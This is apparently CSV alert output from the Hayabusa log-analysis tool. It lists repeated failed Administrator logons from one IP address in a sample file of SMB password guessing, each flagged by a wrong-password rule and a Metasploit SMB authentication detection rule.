Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.945 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uMJWwjG7J2sOiBYd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.945 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.984 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3YusfxQQygi2x5Cu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.984 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:02.024 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6q29uj6ovfwz0riC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:02.024 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:02.072 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cj38VsqGLoQ8jGdf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:02.072 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:02.120 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TOW8OIO2vQRFaTID : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:02.120 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:02.173 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DfYITdZCYwEj9IJV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:02.173 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:02.205 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4BI6V35tZGZ1WGtJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:02.205 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:02.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wOF75n4aunKH9qxc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:02.256 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:02.296 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jsTFTCnFFBkhG5jP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:02.296 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:02.328 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5qiwcKE2TQui2H8z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:02.328 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:02.380 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PZOCyXplWOCyKbFm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:02.380 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:02.416 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RhyaAhYB78nbh1Ig : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:02.416 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:02.462 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MIJU9xbr1klIvvdE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:02.462 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:02.506 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qLKVR3mW3g3utO4X : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:02.506 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:02.544 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aNm4tVG8bV7e9gbB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:02.544 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:02.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JtU0PCr9K5DXFYV2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:02.580 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:02.622 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CH3BWNPEWlw52Gb6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:02.622 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:02.660 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vQTYqFKBz6YEWhF6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:02.660 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:02.708 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qkj3u8ODgLD7xQ5R : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:02.708 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:02.758 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: r9uyze1uO0zuNNUM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:02.758 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:02.803 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UmL15i3edXHcUamI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:02.803 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:02.840 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: x7xjFRjv9rDhiXJ6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:02.840 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:02.880 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6BmQhVEv8g7EKu1F : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:02.880 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:02.920 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: upOMmG87cDO1NFg0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:02.920 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:02.963 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tO55KfkORhxFORvF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:02.963 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: D64wDbqkqmzWuUSa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.008 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sIDgNIlGA0cOkBOI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.056 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.082 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: i0kXPQ6s7CGe4QGA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.082 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.156 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HW5jP389jmqSkzF1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.156 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.186 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: enhsof25BdDPcI2c : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.186 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.228 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4acsPMLUJRrT7mmL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.228 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.272 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hi1dzny6hpyr5N3d : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.272 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.305 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RlPVBSnDMlE0QZaJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.305 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.348 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: th72TwMoRXtDVWge : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.348 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.387 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KGTTiJSkErjzoUUC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.387 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.424 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xyzZwNLltF0cYnai : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.424 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.464 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gYWVQ6mCqyBfDm3m : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.464 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.505 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rg2x2lv9JeS5Bb6l : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.505 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.536 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fU28NKC3WYxFGbMN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.536 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EUWDXgnogGDXizWj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.580 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.629 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IXhAtnNcQKOIsuGS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.629 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.672 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cKfrJwI3OGdjL4af : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.672 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.724 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VdekC160hU7YzrK9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.724 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.773 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: enOBuzd6jwu8rZCH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.773 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.812 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eAjLjDlZSps5D49t : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.812 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.844 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rY6CONLBVygSTnY5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.844 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.883 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6FIHgz2yqqbD9zfV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.883 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 